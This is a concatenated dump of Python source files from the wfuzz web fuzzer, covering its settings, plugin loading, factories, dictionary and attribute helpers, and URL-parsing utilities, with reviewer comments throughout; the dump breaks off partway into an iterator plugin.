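/src/wfuzz/externals/moduleman/plugin.py:
--------------------------------------------------------------------------------
try:
    from collections.abc import Callable
except ImportError:
    from collections import Callable


def moduleman_plugin(*args):
    """Class decorator that marks a class as a moduleman plugin.

    Used bare (``@moduleman_plugin``) the decorated class is marked directly.
    Called with method names (``@moduleman_plugin("a", "b")``) it returns a
    decorator that first checks that every name is listed by ``dir(cls)``
    and raises ``Exception`` for the first one that is missing.
    """
    method_args = []

    def inner_decorator(cls):
        for method in method_args:
            if method not in dir(cls):
                raise Exception("Required method %s not implemented" % method)
        # Set from a plain function, so the attribute name is not mangled.
        cls.__PLUGIN_MODULEMAN_MARK = "Plugin mark"

        return cls

    # A non-callable first argument means the decorator was given method names.
    if not isinstance(args[0], Callable):
        method_args += args
        return inner_decorator

    return inner_decorator(args[0])

--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/__init__.py:
--------------------------------------------------------------------------------
from .Request import Request
from .Response import Response

--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/cache.py:
--------------------------------------------------------------------------------
from collections import defaultdict


class HttpCache:
    """Remembers which request cache keys were already seen, per category."""

    def __init__(self):
        # cache key -> list of categories that already recorded it
        self.__cache_map = defaultdict(list)

    def update_cache(self, req, category="default"):
        """Record ``req`` under ``category``.

        Returns True when the (key, category) pair is new and False when it
        was already recorded. The key comes from ``req.to_cache_key()``.
        """
        categories = self.__cache_map[req.to_cache_key()]

        if category in categories:
            return False

        categories.append(category)
        return True

    def msg_in_cache(self, req, category="default"):
        """Return True when ``req`` was already recorded under ``category``."""
        key = req.to_cache_key()

        # Test membership first so that a lookup never creates an entry
        # in the defaultdict.
        return key in self.__cache_map and category in self.__cache_map[key]

--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/exceptions.py:
--------------------------------------------------------------------------------
class ReqRespException(Exception):
    """Request/response error carrying an error type and a message.

    ``etype`` is presumably one of the class constants below (confirm
    against the raise sites, which are not in this module).
    """

    FATAL, RESOLVE_PROXY, RESOLVE_HOST, CONNECT_HOST, SSL, TIMEOUT = list(range(6))

    def __init__(self, etype, msg):
        self.etype = etype
        self.msg = msg
        Exception.__init__(self, msg)

--------------------------------------------------------------------------------
/src/wfuzz/externals/settings/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/settings/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/externals/settings/settings.py:
--------------------------------------------------------------------------------
# Python 2 and 3 (after ``pip install configparser``):
try:
    from configparser import ConfigParser
except ImportError:
    # Import the class, not the module: the code below calls ConfigParser().
    from ConfigParser import ConfigParser
import os
import sys


class SettingsBase:
    """
    Contains application settings. Uses a ConfigParser.

    Subclasses provide get_config_file() and set_defaults().
    """

    def __init__(self, save=False):
        """Load the defaults, then overlay whatever the config file holds.

        ``save`` is accepted but not used by this constructor.
        """
        self.cparser = ConfigParser()

        self.set_all(self.set_defaults())
        # os.path.join drops the program directory when get_config_file()
        # returns an absolute path.
        self.filename = os.path.join(
            self._path_to_program_dir(), self.get_config_file()
        )
        # ConfigParser.read() silently skips a file it cannot open, so a
        # missing config file leaves the defaults in place.
        self.cparser.read(self.filename)

    # Base members should implement

    def get_config_file(self):
        """Returns the name of the file where the config is saved."""
        raise NotImplementedError

    def set_defaults(self):
        """
        Returns a dictionary with the default settings in the form of
        {
            Section: [
                ("setting_x", '5'),
                ...
                ("setting_y", '5'),
            ],
            ...
        }
        """
        raise NotImplementedError

    def has_option(self, section, setting):
        """Return True when ``setting`` exists in ``section``."""
        return self.cparser.has_option(section, setting)

    def set(self, section, setting, value):
        """Set ``setting`` in ``section`` (in memory only; see save())."""
        self.cparser.set(section, setting, value)

    def get(self, section, setting):
        """Return the value of ``setting`` in ``section``."""
        value = self.cparser.get(section, setting)
        return value

    def get_section(self, section):
        """Return the (option, value) pairs of ``section``."""
        return self.cparser.items(section)

    def get_options(self, section):
        """Return the option names of ``section``."""
        return self.cparser.options(section)

    def get_sections(self):
        """Return the section names."""
        return self.cparser.sections()

    def get_all(self):
        """Return every setting as {section: [(option, value), ...]}.

        A section without options does not appear in the result.
        """
        sett = {}

        # dump entire config file
        for section in self.cparser.sections():
            for option in self.cparser.options(section):
                sett.setdefault(section, []).append(
                    (option, self.cparser.get(section, option))
                )

        return sett

    def set_all(self, sett):
        """Replace the whole configuration with ``sett`` (see set_defaults)."""
        self.cparser = ConfigParser()
        for section, settings in sett.items():
            self.cparser.add_section(section)
            for key, value in settings:
                self.cparser.set(section, key, value)

    def save(self):
        """Write the settings to ``self.filename``.

        Returns True on success and False on any error. The settings can
        hold API keys, so a file created here is readable and writable by
        its owner only; the mode of an already existing file is left as is.
        """
        try:
            fd = os.open(
                self.filename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600
            )
            with os.fdopen(fd, "w") as ini_file:
                self.cparser.write(ini_file)
        except Exception:
            return False
        return True

    def _path_to_program_dir(self):
        """
        Returns path to program directory
        """
        path = sys.argv[0]

        if not os.path.isdir(path):
            path = os.path.dirname(path)

        if not path:
            return "."

        return path

--------------------------------------------------------------------------------
/src/wfuzz/facade.py:
--------------------------------------------------------------------------------
from .helpers.file_func import get_home, get_path, get_config_dir
from .helpers.obj_factory import Singleton
from . import __version__ as version
from .externals.moduleman.registrant import MulRegistrant
from .externals.moduleman.loader import DirLoader
from .externals.settings.settings import SettingsBase
from .exception import FuzzExceptNoPluginError, FuzzExceptPluginLoadError

import os


ERROR_CODE = -1
BASELINE_CODE = -2


class Settings(SettingsBase):
    """wfuzz settings, stored in ``wfuzz.ini``."""

    def get_config_file(self):
        """Return the path of the config file to use.

        An existing file in the config directory wins, then an existing file
        in the legacy home directory; otherwise the config-directory path is
        returned, this time calling get_config_dir(check=True).
        """
        config_file = "wfuzz.ini"

        config = os.path.join(get_config_dir(check=False), config_file)
        legacy_config = os.path.join(get_home(check=False), config_file)

        if os.path.exists(config):
            return config
        elif os.path.exists(legacy_config):
            return legacy_config
        return os.path.join(get_config_dir(check=True), config_file)

    def set_defaults(self):
        """Return the default settings.

        The ``plugins`` section holds API keys, so the saved file should not
        be readable by other users.
        """
        return dict(
            plugins=[("bing_apikey", ""), ("shodan_apikey", "")],
            kbase=[
                (
                    "discovery.blacklist",
                    ".svg-.css-.js-.jpg-.gif-.png-.jpeg-.mov-.avi-.flv-.ico",
                )
            ],
            connection=[
                ("concurrent", "10"),
                ("conn_delay", "90"),
                ("req_delay", "90"),
                ("retries", "3"),
                ("User-Agent", "Wfuzz/%s" % version),
            ],
            general=[
                ("default_printer", "raw"),
                ("cancel_on_plugin_except", "0"),
                ("concurrent_plugins", "3"),
                ("lookup_dirs", "."),
                ("encode_space", "1"),
            ],
        )


class MyRegistrant(MulRegistrant):
    """MulRegistrant that reports a missing plugin as FuzzExceptNoPluginError."""

    def get_plugin(self, identifier):
        try:
            return MulRegistrant.get_plugin(self, identifier)
        except KeyError as e:
            raise FuzzExceptNoPluginError(
                "Requested plugin %s. Error: %s" % (identifier, str(e))
            )


class Facade(metaclass=Singleton):
    """Single access point to the settings and to the plugin registrants."""

    def __init__(self):

        # One registrant per category, created on first use by _load().
        self.__plugins = dict(
            printers=None, scripts=None, encoders=None, iterators=None, payloads=None,
        )

        self.sett = Settings()

    def _load(self, cat):
        """Return the registrant of category ``cat``, creating it on first use.

        Plugins are looked up in the bundled ``../plugins`` directory and in
        the directory returned by get_home().
        NOTE(review): DirLoader presumably imports the Python modules it
        finds there; if so, the home plugin directory must be writable only
        by the user running wfuzz. Confirm against DirLoader.

        Every failure, including an unknown category, is re-raised as
        FuzzExceptPluginLoadError.
        """
        try:
            if cat not in self.__plugins:
                raise FuzzExceptNoPluginError("Non-existent plugin category %s" % cat)

            if not self.__plugins[cat]:
                loader_list = []
                loader_list.append(
                    DirLoader(**{"base_dir": cat, "base_path": get_path("../plugins")})
                )
                loader_list.append(
                    DirLoader(**{"base_dir": cat, "base_path": get_home()})
                )
                self.__plugins[cat] = MyRegistrant(loader_list)

            return self.__plugins[cat]
        except Exception as e:
            raise FuzzExceptPluginLoadError("Error loading plugins: %s" % str(e))

    def proxy(self, which):
        """Return the registrant of category ``which``."""
        return self._load(which)

    def get_registrants(self):
        """Return the known plugin category names."""
        return self.__plugins.keys()

    def __getattr__(self, name):
        """Expose each plugin category as an attribute (``Facade().payloads``)."""
        if name in ["printers", "payloads", "iterators", "encoders", "scripts"]:
            return self._load(name)
        else:
            # Name the attribute so the resulting error message is usable.
            raise AttributeError(name)

--------------------------------------------------------------------------------
/src/wfuzz/factories/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/factories/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/factories/fuzzfactory.py:
--------------------------------------------------------------------------------
from ..fuzzrequest import FuzzRequest

from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper


class FuzzRequestFactory(ObjectFactory):
    """Factory of FuzzRequest objects, keyed by builder name."""

    def __init__(self):
        ObjectFactory.__init__(
            self,
            {
                "request_from_options": RequestBuilder(),
                "seed_from_options": SeedBuilder(),
            },
        )


class RequestBuilder:
    """Builds a FuzzRequest from the ``url`` and ``method`` options."""

    def __call__(self, options):
        fr = FuzzRequest()

        fr.url = options["url"]
        fr.wf_fuzz_methods = options["method"]
        fr.update_from_options(options)

        return fr


class SeedBuilder:
    """Builds a request from options and removes its baseline markers."""

    def __call__(self, options):
        seed = reqfactory.create("request_from_options", options)
        marker_dict = SeedBuilderHelper.get_marker_dict(seed)
        SeedBuilderHelper.remove_baseline_markers(seed, marker_dict)

        return seed


reqfactory = FuzzRequestFactory()

--------------------------------------------------------------------------------
/src/wfuzz/factories/payman.py:
--------------------------------------------------------------------------------
from ..fuzzobjects import FPayloadManager, FuzzWord, FuzzWordType

from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper


class PayManFactory(ObjectFactory):
    """Factory of FPayloadManager objects, keyed by builder name."""

    def __init__(self):
        ObjectFactory.__init__(
            self,
            {
                "payloadman_from_baseline": BaselinePayloadManBuilder(),
                "payloadman_from_request": FuzzReqPayloadManBuilder(),
                "empty_payloadman": OnePayloadManBuilder(),
            },
        )


class FuzzReqPayloadManBuilder:
    """Registers every marker of a request that has a ``word``."""

    def __call__(self, freq):
        fpm = FPayloadManager()

        for pdict in SeedBuilderHelper.get_marker_dict(freq):
            if pdict["word"] is not None:
                fpm.add(pdict)

        return fpm


class OnePayloadManBuilder:
    """Builds a manager holding ``content`` under an all-None marker."""

    def __call__(self, content):
        fpm = FPayloadManager()
        fpm.add(
            {"full_marker": None, "word": None, "index": None, "field": None}, content
        )

        return fpm


class BaselinePayloadManBuilder:
    """Registers every marker of a request that has a baseline value."""

    def __call__(self, freq):
        fpm = FPayloadManager()

        for pdict in SeedBuilderHelper.get_marker_dict(freq):
            if pdict["bl_value"] is not None:
                fpm.add(pdict, FuzzWord(pdict["bl_value"], FuzzWordType.WORD), True)

        return fpm


payman_factory = PayManFactory()

--------------------------------------------------------------------------------
/src/wfuzz/factories/plugin_factory.py:
--------------------------------------------------------------------------------
from ..helpers.obj_factory import ObjectFactory

from ..fuzzobjects import FuzzPlugin, FuzzError
from ..factories.fuzzresfactory import resfactory


class PluginFactory(ObjectFactory):
    """Factory of FuzzPlugin result objects, keyed by builder name."""

    def __init__(self):
        ObjectFactory.__init__(
            self,
            {
                "plugin_from_recursion": PluginRecursiveBuilder(),
                "plugin_from_error": PluginErrorBuilder(),
                "plugin_from_finding": PluginFindingBuilder(),
                "plugin_from_summary": PluginFindingSummaryBuilder(),
            },
        )


class PluginRecursiveBuilder:
    """Builds a FuzzPlugin that carries a new seed for ``url``."""

    def __call__(self, name, seed, url):
        plugin = FuzzPlugin()
        plugin.source = name
        plugin._exception = None
        plugin._seed = resfactory.create("fuzzres_from_recursion", seed, url)

        return plugin


class PluginErrorBuilder:
    """Builds a FuzzPlugin that reports an exception raised inside a plugin."""

    def __call__(self, name, exception):
        plugin = FuzzPlugin()
        plugin.source = name
        plugin.issue = "Exception within plugin %s: %s" % (name, str(exception))
        plugin._exception = FuzzError(exception)
        plugin._seed = None

        return plugin


class PluginFindingBuilder:
    """Builds a FuzzPlugin that reports a finding."""

    def __call__(self, name, itype, message, data, severity):
        plugin = FuzzPlugin()
        plugin.source = name
        plugin.issue = message
        plugin.itype = itype
        plugin.data = data
        plugin._exception = None
        plugin._seed = None
        plugin.severity = severity

        return plugin


class PluginFindingSummaryBuilder:
    """Builds a FuzzPlugin that carries a summary message."""

    def __call__(self, message):
        plugin = FuzzPlugin()
        plugin.source = FuzzPlugin.OUTPUT_SOURCE
        plugin.itype = FuzzPlugin.SUMMARY_ITYPE
        plugin.severity = FuzzPlugin.NONE
        plugin._exception = None
        plugin.data = None
        plugin._seed = None
        plugin.issue = message

        return plugin


plugin_factory = PluginFactory()

--------------------------------------------------------------------------------
/src/wfuzz/filters/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/filters/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/helpers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/helpers/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/helpers/obj_dic.py:
--------------------------------------------------------------------------------
from collections.abc import MutableMapping
from itertools import chain


class CaseInsensitiveDict(MutableMapping):
    """Mapping with case-insensitive string keys.

    ``store`` maps each key, in the case it was set with, to its value;
    ``proxy`` maps the lower-cased key to that original key.
    """

    def __init__(self, *args, **kwargs):
        self.store = dict()
        self.proxy = dict()

        self.update(dict(*args, **kwargs))  # use the free update to set keys

    def __contains__(self, k):
        return k.lower() in self.proxy

    def __delitem__(self, k):
        key = self.proxy[k.lower()]

        del self.store[key]
        del self.proxy[k.lower()]

    def __getitem__(self, k):
        key = self.proxy[k.lower()]
        return self.store[key]

    def get(self, k, default=None):
        """Return the value stored for ``k``, or ``default`` when absent."""
        try:
            key = self.proxy[k.lower()]
        except KeyError:
            # A missing key must yield the default instead of raising.
            return default
        return self.store.get(key, default)

    def __setitem__(self, k, v):
        # NOTE(review): setting the same key again with a different case
        # leaves the earlier spelling in ``store``, so it still shows up in
        # iteration and len(). Confirm whether callers rely on that.
        self.store[k] = v
        self.proxy[k.lower()] = k

    def __iter__(self):
        return iter(self.store)

    def __len__(self):
        return len(self.store)


class DotDict(CaseInsensitiveDict):
    """CaseInsensitiveDict whose keys can also be read as attributes.

    A missing key or attribute yields an empty DotDict instead of raising.
    """

    def __getattr__(self, name):
        # This hook runs for the backing dicts only when they are missing
        # (an instance created without __init__); answering from the mapping
        # would then recurse through __contains__.
        if name in ("store", "proxy"):
            raise AttributeError(name)

        # Return {} if non-existent attr
        if name not in self:
            return DotDict({})

        val = self.get(name)
        return DotDict(val) if type(val) is dict else val

    def __add__(self, other):
        """Append ``other`` to every truthy value, or merge with a DotDict.

        Returns None for any other operand type.
        """
        if isinstance(other, str):
            return DotDict({k: v + other for k, v in self.items() if v})
        elif isinstance(other, DotDict):
            new_dic = DotDict(self)
            new_dic.update(other)
            return new_dic

    def __radd__(self, other):
        """Prepend the string ``other`` to every truthy value.

        Returns None when ``other`` is not a string.
        """
        if isinstance(other, str):
            return DotDict({k: other + v for k, v in self.items() if v})

    def __getitem__(self, key):
        try:
            return super(DotDict, self).__getitem__(key)
        except KeyError:
            return DotDict({})

    def __str__(self):
        return "\n".join(
            [
                "{}{} {}".format(k, "->" if isinstance(v, DotDict) else ":", v)
                for k, v in self.items()
            ]
        )

--------------------------------------------------------------------------------
/src/wfuzz/helpers/obj_dyn.py:
--------------------------------------------------------------------------------
import functools
from .obj_dic import DotDict


# Field-name prefixes accepted by _check_allowed_field().
allowed_fields = [
    "description",
    "nres",
    "code",
    "chars",
    "lines",
    "words",
    "md5",
    "l",
    "h",
    "w",
    "c",
    "history",
    "plugins",
    "url",
    "content",
    "history.url",
    "history.method",
    "history.scheme",
    "history.host",
    "history.content",
    # A comma was missing here, which fused this entry with the next one.
    "history.raw_content",
    "history.is_path",
    "history.pstrip",
    "history.cookies",
    "history.headers",
    "history.params",
    "r",
    "r.reqtime",
    "r.url",
    "r.method",
    "r.scheme",
    "r.host",
    "r.content",
    # Same missing comma as above.
    "r.raw_content",
    "r.is_path",
    "r.pstrip",
    "r.cookies.",
    "r.headers.",
    "r.params.",
]


def _check_allowed_field(attr):
    """Return True when ``attr`` starts with one of ``allowed_fields``.

    The match is a prefix match, so the one-letter entries accept any name
    that begins with that letter.
    """
    return any(attr.startswith(field) for field in allowed_fields)


def _get_alias(attr):
    """Expand a one-letter alias to its field name; other names pass through."""
    attr_alias = {
        "l": "lines",
        "h": "chars",
        "w": "words",
        "c": "code",
        "r": "history",
    }

    return attr_alias.get(attr, attr)


def rsetattr(obj, attr, new_val, operation):
    """Set the dotted attribute path ``attr`` on ``obj``.

    With ``operation`` the stored value is ``operation(previous, new_val)``;
    without it the value is ``new_val``, or a dict mapping every key of the
    previous DotDict to ``new_val``. Raises AttributeError when the path
    cannot be read or set.

    NOTE(review): the allow-list check below is commented out, so the path
    is not restricted here; callers that build ``attr`` from user input
    have to validate it themselves.
    """
    # if not _check_allowed_field(attr):
    #    raise AttributeError("Unknown field {}".format(attr))

    pre, _, post = attr.rpartition(".")

    pre_post = None
    if len(attr.split(".")) > 3:
        pre_post = post
        pre, _, post = pre.rpartition(".")

    post = _get_alias(post)

    # Bound before the try block so the error message below can be built
    # even when resolving ``pre`` is what failed.
    obj_to_set = obj
    try:
        obj_to_set = rgetattr(obj, pre) if pre else obj
        prev_val = rgetattr(obj, attr)
        if pre_post is not None:
            prev_val = DotDict({pre_post: prev_val})

        if operation is not None:
            val = operation(prev_val, new_val)
        else:
            if isinstance(prev_val, DotDict):
                val = {k: new_val for k, v in prev_val.items()}
            else:
                val = new_val

        return setattr(obj_to_set, post, val)
    except AttributeError:
        raise AttributeError(
            "rsetattr: Can't set '{}' attribute of {}.".format(
                post, obj_to_set.__class__
            )
        )


def rgetattr(obj, attr, *args):
    """Return the dotted attribute path ``attr`` of ``obj``.

    Every path component goes through _get_alias() and then getattr();
    ``args`` is passed to getattr() as its optional default.

    NOTE(review): the allow-list check below is commented out, so any
    attribute reachable from ``obj`` can be read through this helper.
    """

    def _getattr(obj, attr):
        attr = _get_alias(attr)
        try:
            return getattr(obj, attr, *args)
        except AttributeError:
            raise AttributeError(
                "rgetattr: Can't get '{}' attribute from '{}'.".format(
                    attr, obj.__class__
                )
            )

    # if not _check_allowed_field(attr):
    #    raise AttributeError("Unknown field {}".format(attr))

    return functools.reduce(_getattr, [obj] + attr.split("."))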
--------------------------------------------------------------------------------
/src/wfuzz/helpers/str_func.py:
--------------------------------------------------------------------------------
import re
import sys
import six


from .obj_dic import DotDict


def json_minify(string, strip_space=True):
    """
    Return ``string`` with its ``/* */`` and ``//`` comments removed and,
    when ``strip_space`` is true, with the whitespace outside of string
    literals removed as well. The content of string literals is kept.

    Created on 20/01/2011
    v0.2 (C) Gerald Storer
    MIT License
    Based on JSON.minify.js:
    https://github.com/getify/JSON.minify
    Contributers:
    - Pradyun S. Gedam (conditions and variable names changed)
    """

    # Tokens that can change state: a quote, a comment opener or closer,
    # or a line break.
    tokenizer = re.compile(r'"|(/\*)|(\*/)|(//)|\n|\r')
    # Run of backslashes that ends right before the current position.
    end_slashes_re = re.compile(r"(\\)*$")

    in_string = False
    in_multi = False
    in_single = False

    new_str = []
    index = 0

    for match in re.finditer(tokenizer, string):

        # Text between two tokens is kept unless it is inside a comment.
        if not (in_multi or in_single):
            tmp = string[index : match.start()]
            if not in_string and strip_space:
                # replace white space as defined in standard
                tmp = re.sub("[ \t\n\r]+", "", tmp)
            new_str.append(tmp)

        index = match.end()
        val = match.group()

        if val == '"' and not (in_multi or in_single):
            escaped = end_slashes_re.search(string, 0, match.start())

            # start of string or unescaped quote character to end string
            # (an even number of preceding backslashes leaves the quote
            # unescaped)
            if not in_string or (escaped is None or len(escaped.group()) % 2 == 0):
                in_string = not in_string
            # include " character in next catch
            index -= 1
        elif not (in_string or in_multi or in_single):
            if val == "/*":
                in_multi = True
            elif val == "//":
                in_single = True
        elif val == "*/" and in_multi and not (in_string or in_single):
            in_multi = False
        elif val in "\r\n" and not (in_multi or in_string) and in_single:
            in_single = False
        elif not ((in_multi or in_single) or (val in " \r\n\t" and strip_space)):
            new_str.append(val)

    # Whatever follows the last token.
    new_str.append(string[index:])
    return "".join(new_str)
def python2_3_convert_from_unicode(text):
    """Return ``text`` unchanged on Python 3; on Python 2 run convert_to_unicode()."""
    if sys.version_info < (3, 0):
        return convert_to_unicode(text)
    return text


def python2_3_convert_to_unicode(text):
    """Run convert_to_unicode() on Python 3; on Python 2 return ``text`` unchanged."""
    if sys.version_info < (3, 0):
        return text
    return convert_to_unicode(text)


def convert_to_unicode(text):
    """Recursively UTF-8 encode the strings found in ``text``.

    Mappings (dict or DotDict) come back as a plain dict with converted keys
    and values, lists come back as lists of converted elements, strings are
    encoded with errors ignored, and any other value is returned as is.
    """
    if isinstance(text, (dict, DotDict)):
        converted = {}
        for key, value in list(text.items()):
            converted[convert_to_unicode(key)] = convert_to_unicode(value)
        return converted

    if isinstance(text, list):
        return [convert_to_unicode(element) for element in text]

    if isinstance(text, six.string_types):
        return text.encode("utf-8", errors="ignore")

    return text


def value_in_any_list_item(value, list_obj):
    """Case-insensitive substring test of ``value`` against ``list_obj``.

    For a list, True when ``value`` occurs in at least one item; for a
    string, True when ``value`` occurs in it. Returns None for any other
    type of ``list_obj``.
    """
    if isinstance(list_obj, list):
        matches = [item for item in list_obj if value.lower() in item.lower()]
        return bool(matches)

    if isinstance(list_obj, str):
        return value.lower() in list_obj.lower()

--------------------------------------------------------------------------------
/src/wfuzz/helpers/utils.py:
--------------------------------------------------------------------------------
from threading import Lock
import difflib


class MyCounter:
    """Integer counter whose reads and updates are guarded by a lock."""

    def __init__(self, count=0):
        self._count = count
        self._mutex = Lock()

    def inc(self):
        """Add one and return the new value."""
        return self._operation(1)

    def dec(self):
        """Subtract one and return the new value."""
        return self._operation(-1)

    def _operation(self, dec):
        """Add ``dec`` to the counter under the lock and return the result."""
        with self._mutex:
            self._count += dec
            return self._count

    def __call__(self):
        """Return the current value."""
        with self._mutex:
            return self._count


def diff(param1, param2):
    """Return a unified diff, with no context lines, of the two values' str() forms."""
    before = str(param1).splitlines(False)
    after = str(param2).splitlines(False)

    return "\n".join(
        difflib.unified_diff(before, after, fromfile="prev", tofile="current", n=0)
    )
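--------------------------------------------------------------------------------
/src/wfuzz/mixins.py:
--------------------------------------------------------------------------------
from .plugin_api.urlutils import parse_url
from .exception import FuzzExceptBadInstall

# python 2 and 3
import sys

if sys.version_info >= (3, 0):
    from urllib.parse import urljoin, urlparse
else:
    from urlparse import urljoin, urlparse


class FuzzRequestSoupMixing(object):
    """Adds HTML parsing of ``self.content`` through BeautifulSoup."""

    def get_soup(self):
        """Return ``self.content`` parsed with the ``html.parser`` backend.

        Raises FuzzExceptBadInstall when beautifulsoup4 is not installed.
        """
        try:
            from bs4 import BeautifulSoup
        except ImportError:
            raise FuzzExceptBadInstall("You need to install beautifulsoup4 first!")

        soup = BeautifulSoup(self.content, "html.parser")

        return soup


class FuzzRequestUrlMixing(object):
    """URL helpers for objects that provide ``url``, ``code`` and ``headers``."""

    # urlparse functions
    @property
    def urlparse(self):
        return parse_url(self.url)

    @property
    def urlp(self):
        return parse_url(self.url)

    @property
    def pstrip(self):
        return self.to_cache_key()

    @property
    def is_path(self):
        """True when recursive_url is set and ends with a slash."""
        # Read the property once: each access evaluates it again.
        target = self.recursive_url

        return bool(target) and target.endswith("/")

    @property
    def recursive_url(self):
        """Return the URL to recurse into, or None.

        For a response code from 300 to 307 with a ``Location`` header, the
        target is returned only when it has neither a scheme nor a network
        location, resolved against ``self.url``; an absolute or
        scheme-relative redirect, which may point at another host, yields
        None. For a 200 or 401 response the request URL is returned when it
        ends with a slash.
        """
        if 300 <= self.code < 308 and "Location" in self.headers.response:
            location_url = self.headers.response["Location"]
            location_parsed_url = urlparse(location_url)

            if not location_parsed_url.scheme and not location_parsed_url.netloc:
                return urljoin(self.url, location_url)
        # endswith() also copes with an empty URL, where indexing would raise.
        elif self.code in [200, 401] and self.url.endswith("/"):
            return self.url

        return None

--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugin_api/__init__.py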
--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/mixins.py:
--------------------------------------------------------------------------------
# Plugins specializations with common methods useful for their own type
from wfuzz.plugin_api.urlutils import parse_url
from .base import BasePlugin


class DiscoveryPluginMixin:
    """Plugin mixin that refuses to queue URLs with a blacklisted extension."""

    def queue_url(self, url):
        """Queue ``url`` unless its extension is blacklisted.

        Returns True when the URL was queued and False when it was skipped.
        """
        if parse_url(url).isbllist:
            return False

        BasePlugin.queue_url(self, url)
        return True

--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/urlutils.py:
--------------------------------------------------------------------------------
import os


# Python 2 and 3
import sys

if sys.version_info >= (3, 0):
    from urllib.parse import ParseResult
    from urllib.parse import urlparse
    from urllib.parse import parse_qs
else:
    from urlparse import ParseResult
    from urlparse import urlparse
    from urlparse import parse_qs

from wfuzz.facade import Facade
from wfuzz.exception import FuzzExceptBadAPI


class FuzzRequestParse(ParseResult):
    """ParseResult with helpers for the file name, extension and cache key."""

    @property
    def ffname(self):
        """
        Script name with its extension, i.e. the last path segment.
        For http://www.localhost.com/kk/index.html?id=3 this is index.html
        """
        return self.path.rsplit("/", 1)[-1]

    @property
    def fext(self):
        """
        Extension of the script, including the dot.
        For http://www.localhost.com/kk/index.html?id=3 this is .html
        """
        _, extension = os.path.splitext(self.ffname)
        return extension

    @property
    def fname(self):
        """
        Script name without its extension.
        For http://www.localhost.com/kk/index.html?id=3 this is index
        """
        stem, _ = os.path.splitext(self.ffname)
        return stem

    @property
    def isbllist(self):
        """True when the extension is listed in the discovery blacklist.

        The list is the dash-separated ``discovery.blacklist`` setting of
        the ``kbase`` section; the comparison is case-sensitive.
        """
        extension = self.fext
        if extension == ".":
            return False

        blacklist = Facade().sett.get("kbase", "discovery.blacklist").split("-")
        return extension in blacklist

    @property
    def hasquery(self):
        """True when the URL has a query string."""
        return self.query != ""

    def cache_key(self, base_urlp=None):
        """Return a key made of scheme, host, path, params and query names.

        A missing scheme or network location is taken from ``base_urlp``
        when one is given. Only the names of the query parameters are part
        of the key, sorted and prefixed with ``g``; their values are not.
        parse_qs() is called with its defaults, so a parameter whose value
        is blank does not contribute to the key.
        """
        scheme, netloc = self.scheme, self.netloc

        if base_urlp:
            scheme = scheme or base_urlp.scheme
            netloc = netloc or base_urlp.netloc

        base = "{}-{}-{}-{}".format(scheme, netloc, self.path, self.params)

        # take URL parameters into consideration
        names = sorted("g{}".format(name) for name in parse_qs(self.query))

        return base + "-" + "-".join(names)


def parse_url(url):
    """Parse ``url`` with urlparse() and wrap the result in FuzzRequestParse."""
    # >>> urlparse.urlparse("http://some.page.pl/nothing.py;someparam=some;otherparam=other?query1=val1&query2=val2#frag")
    # ParseResult(scheme='http', netloc='some.page.pl', path='/nothing.py', params='someparam=some;otherparam=other', query='query1=val1&query2=val2', fragment='frag')

    return FuzzRequestParse(*urlparse(url))


def check_content_type(fuzzresult, which):
    """Return True when the response content type matches ``which``.

    Only ``"text"`` is supported: it matches a response without a
    Content-Type header, or one whose header contains ``text/plain``.
    Any other ``which`` raises FuzzExceptBadAPI.
    """
    response_headers = fuzzresult.history.headers.response
    ctype = None
    if "Content-Type" in response_headers:
        ctype = response_headers["Content-Type"]

    if which != "text":
        raise FuzzExceptBadAPI("Unknown content type")

    return not ctype or "text/plain" in ctype

--------------------------------------------------------------------------------
/src/wfuzz/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/__init__.py
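--------------------------------------------------------------------------------
/src/wfuzz/plugins/encoders/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/encoders/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/iterators/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/iterators/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/iterators/iterations.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.dictionaries import BaseIterator

import itertools
from functools import reduce

from builtins import zip as builtinzip


@moduleman_plugin
class zip(BaseIterator):
    """Iterator plugin that pairs up the items of its payloads (builtin zip)."""

    name = "zip"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Returns an iterator that aggregates elements from each of the iterables."
    category = ["default"]
    priority = 99

    def __init__(self, *i):
        self._payload_list = i
        self.__width = len(i)
        # zip stops at the shortest payload.
        self.__count = min(x.count() for x in i)
        self.it = builtinzip(*i)

    def count(self):
        return self.__count

    def width(self):
        return self.__width

    def payloads(self):
        return self._payload_list

    def __next__(self):
        return next(self.it)

    def __iter__(self):
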